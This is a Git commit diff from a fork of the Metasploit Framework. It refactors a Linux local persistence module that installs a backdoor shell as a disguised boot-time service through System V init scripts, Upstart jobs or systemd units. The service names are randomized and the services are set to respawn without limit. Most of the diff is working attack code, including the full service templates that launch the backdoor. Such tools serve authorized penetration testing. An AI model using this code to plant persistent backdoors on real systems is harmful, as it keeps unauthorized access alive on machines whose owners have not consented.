dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

updates round 2

This commit is contained in:
h00die 2016-07-15 09:02:23 -04:00
parent 1c20122648
commit 03dca5fee2
1 changed files with 113 additions and 115 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

228
modules/exploits/linux/local/service_persistence.rb
View File

@ -3,9 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/file'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
@ -47,8 +44,8 @@ class MetasploitModule < Msf::Exploit::Local
'Targets' =>
[
['Auto', {}],
['System V', { 'runlevel' => '2 3 4 5' }],
['Upstart', { 'runlevel' => '2345' }],
['System V', { :runlevel => '2 3 4 5' }],
['Upstart', { :runlevel => '2345' }],
['systemd', {}]
],
'DefaultTarget' => 0,
@ -84,13 +81,13 @@ class MetasploitModule < Msf::Exploit::Local
def exploit
backdoor = write_shell(datastore['SHELLPATH'])
path = backdoor.split(File::SEPARATOR)[0...-1].join('/')
file = backdoor.split(File::SEPARATOR)[-1]
path = backdoor.split('/')[0...-1].join('/')
file = backdoor.split('/')[-1]
case target.name
when 'System V'
system_v(path, file, target.opts['runlevel'], service_system_exists?('update-rc.d'))
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
when 'Upstart'
upstart(path, file, target.opts['runlevel'])
upstart(path, file, target.opts[:runlevel])
when 'systemd'
systemd(path, file)
else
@ -129,17 +126,17 @@ class MetasploitModule < Msf::Exploit::Local
def systemd(backdoor_path, backdoor_file)
# https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
script = "[Unit]\n"
script << "Description=Start daemon at boot time\n"
script << "After=\n"
script << "Requires=\n"
script << "[Service]\n"
script << "RestartSec=10s\n"
script << "Restart=always\n"
script << "TimeoutStartSec=5\n"
script << "ExecStart=/bin/sh #{backdoor_path}#{File::SEPARATOR}#{backdoor_file}\n"
script << "[Install]\n"
script << "WantedBy=multi-user.target\n"
script = %{[Unit]
Description=Start daemon at boot time
After=
Requires=
[Service]
RestartSec=10s
Restart=always
TimeoutStartSec=5
ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
[Install]
WantedBy=multi-user.target}
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
@ -152,17 +149,17 @@ class MetasploitModule < Msf::Exploit::Local
def upstart(backdoor_path, backdoor_file, runlevel)
# http://blog.terminal.com/getting-started-with-upstart/
script = "description \"Start daemon at boot time\"\n"
script << "start on filesystem or runlevel [#{runlevel}]\n"
script << "stop on shutdown\n"
script << "script\n"
script << " cd #{backdoor_path}\n"
script << " echo $$ > /var/run/#{backdoor_file}.pid\n"
script << " exec #{backdoor_file}\n"
script << "end script\n"
script << "post-stop exec sleep 10\n"
script << "respawn\n"
script << "respawn limit unlimited\n"
script = %{description \"Start daemon at boot time\"
start on filesystem or runlevel [#{runlevel}]
stop on shutdown
script
cd #{backdoor_path}
echo $$ > /var/run/#{backdoor_file}.pid
exec #{backdoor_file}
end script
post-stop exec sleep 10
respawn
respawn limit unlimited}
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init/#{service_filename}.conf")
@ -178,95 +175,96 @@ class MetasploitModule < Msf::Exploit::Local
else
print_status('Utilizing chkconfig')
end
script = "#!/bin/sh\n"
script << "### BEGIN INIT INFO\n"
script << "# Provides: service\n"
script << "# Required-Start: $network\n"
script << "# Required-Stop: $network\n"
script << "# Default-Start: #{runlevel}\n"
script << "# Default-Stop: 0 1 6\n"
script << "# Short-Description: Start daemon at boot time\n"
script << "# Description: Enable service provided by daemon.\n"
script << "### END INIT INFO\n"
script << "dir=\"#{backdoor_path}\"\n"
script << "cmd=\"#{backdoor_file}\"\n"
script << "name=`basename $0`\n"
script << "pid_file=\"/var/run/$name.pid\"\n"
script << "stdout_log=\"/var/log/$name.log\"\n"
script << "stderr_log=\"/var/log/$name.err\"\n"
script << "get_pid() {\n"
script << " cat \"$pid_file\"\n"
script << "}\n"
script << "is_running() {\n"
script << " [ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1\n"
script << "}\n"
script << "case \"$1\" in\n"
script << " start)\n"
script << " if is_running; then\n"
script << " echo \"Already started\"\n"
script << " else\n"
script << " echo \"Starting $name\"\n"
script << " cd \"$dir\"\n"
script = %{#!/bin/sh
### BEGIN INIT INFO
# Provides: service
# Required-Start: $network
# Required-Stop: $network
# Default-Start: #{runlevel}
# Default-Stop: 0 1 6
# Short-Description: Start daemon at boot time
# Description: Enable service provided by daemon.
### END INIT INFO
dir=\"#{backdoor_path}\"
cmd=\"#{backdoor_file}\"
name=`basename $0`
pid_file=\"/var/run/$name.pid\"
stdout_log=\"/var/log/$name.log\"
stderr_log=\"/var/log/$name.err\"
get_pid() {
cat \"$pid_file\"
}
is_running() {
[ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1
}
case \"$1\" in
start)
if is_running; then
echo \"Already started\"
else
echo \"Starting $name\"
cd \"$dir\"}
if has_updatercd
script << " sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
else # CentOS didn't like sudo or su...
script << " $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
end
script << " echo $! > \"$pid_file\"\n"
script << " if ! is_running; then\n"
script << " echo \"Unable to start, see $stdout_log and $stderr_log\"\n"
script << " exit 1\n"
script << " fi\n"
script << " fi\n"
script << " ;;\n"
script << " stop)\n"
script << " if is_running; then\n"
script << " echo -n \"Stopping $name..\"\n"
script << " kill `get_pid`\n"
script << " for i in {1..10}\n"
script << " do\n"
script << " if ! is_running; then\n"
script << " break\n"
script << " fi\n"
script << " echo -n \".\"\n"
script << " sleep 1\n"
script << " done\n"
script << " echo\n"
script << " if is_running; then\n"
script << " echo \"Not stopped; may still be shutting down or shutdown may have failed\"\n"
script << " exit 1\n"
script << " else\n"
script << " echo \"Stopped\"\n"
script << " if [ -f \"$pid_file\" ]; then\n"
script << " rm \"$pid_file\"\n"
script << " fi\n"
script << " fi\n"
script << " else\n"
script << " echo \"Not running\"\n"
script << " fi\n"
script << " ;;\n"
script << " restart)\n"
script << " $0 stop\n"
script << " if is_running; then\n"
script << " echo \"Unable to stop, will not attempt to start\"\n"
script << " exit 1\n"
script << " fi\n"
script << " $0 start\n"
script << " ;;\n"
script << " status)\n"
script << " if is_running; then\n"
script << " echo \"Running\"\n"
script << " else\n"
script << " echo \"Stopped\"\n"
script << " exit 1\n"
script << " fi\n"
script << " ;;\n"
script << " *)\n"
script << " echo \"Usage: $0 {start|stop|restart|status}\"\n"
script << " exit 1\n"
script << " ;;\n"
script << "esac\n"
script << "exit 0\n"
script << %{ echo $! > \"$pid_file\"
if ! is_running; then
echo \"Unable to start, see $stdout_log and $stderr_log\"
exit 1
fi
fi
;;
stop)
if is_running; then
echo -n \"Stopping $name..\"
kill `get_pid`
for i in {1..10}
do
if ! is_running; then
break
fi
echo -n \".\"
sleep 1
done
echo
if is_running; then
echo \"Not stopped; may still be shutting down or shutdown may have failed\"
exit 1
else
echo \"Stopped\"
if [ -f \"$pid_file\" ]; then
rm \"$pid_file\"
fi
fi
else
echo \"Not running\"
fi
;;
restart)
$0 stop
if is_running; then
echo \"Unable to stop, will not attempt to start\"
exit 1
fi
$0 start
;;
status)
if is_running; then
echo \"Running\"
else
echo \"Stopped\"
exit 1
fi
;;
*)
echo \"Usage: $0 {start|stop|restart|status}\"
exit 1
;;
esac
exit 0}
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
vprint_status("Writing service: /etc/init.d/#{service_filename}")